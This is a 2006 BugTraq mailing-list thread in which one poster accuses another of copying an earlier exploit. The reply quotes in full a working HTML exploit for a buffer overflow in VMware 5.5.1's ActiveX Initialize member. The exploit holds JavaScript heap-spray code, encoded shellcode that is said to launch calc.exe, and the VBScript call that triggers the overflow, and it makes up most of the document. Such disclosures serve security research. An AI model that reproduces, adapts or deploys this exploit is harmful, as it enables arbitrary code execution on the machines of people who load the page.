BugTraq
VMware 5.5.1 Local Buffer Overflow (HTML Exploit) Nov 26 2006 06:05AM
NormandiaN_MailID Yahoo com (1 replies)
Re: VMware 5.5.1 Local Buffer Overflow (HTML Exploit) Nov 27 2006 07:35PM
str0ke (str0ke milw0rm com)
NormandiaN the code theif,

c0ntex discovered this and released it August 18th 2006, which you
pretty much stole everything line for line. Nice job.

http://www.milw0rm.com/exploits/2264

/str0ke

On 26 Nov 2006 06:05:34 -0000, NormandiaN_MailID (at) yahoo (dot) com [email concealed]
<NormandiaN_MailID (at) yahoo (dot) com [email concealed]> wrote:
> <html>
> <head>
> <title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title>
> </head>
> <body>
> <center>
> <br>
> Discovered By NormandiaN<br>
> Visit my website at http://www.grisapka.org<br>
> <br>
> <h3>
> This will exploit overflow and execute calc.exe on WinXP Pro SP2<br>
> (fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br>
> </h3>
> I have only found a bad solution to this bug. Due to the fact that<br>
> my controlling assembler is a call dword ptr[reg] I need to point<br>
> to a location I control, fine. However my payload is random pretty<br>
> much every run. Therefor I fill half a HUGE buffer with the address<br>
> (pointer) to my evil buffer, which them trampolines me to shellcode<br>
> <br>
> call ptr [reg]<br>
> [reg] -> 0xtrampoline<br>
> 0xtrampoline -> shellcode<br>
> <br>
> </center>
> <script>
> var buffa1 = unescape("%uedb0%u0d91")
> do {
> buffa1 += buffa1;
> }
> while (buffa1.length < 0x500000);
> var buffa2 = unescape("%u9090%u9090")
> do {
> buffa2 += buffa2;
> }
> while (buffa2.length < 0x800000);
> buffa1 += buffa2;
> buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
> "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
> "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
> "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
> "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
> "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
> "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
> "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
> "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
> "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
> "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
> "%uCC4A%uD0FF");
> </script>
> <object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744">
> </object>
> <script language="vbscript">
> VmdbDb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA
> VmdbPoll=200011744
> target.Initialize VmdbDb, VmdbPoll
> </script>
> </body>
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus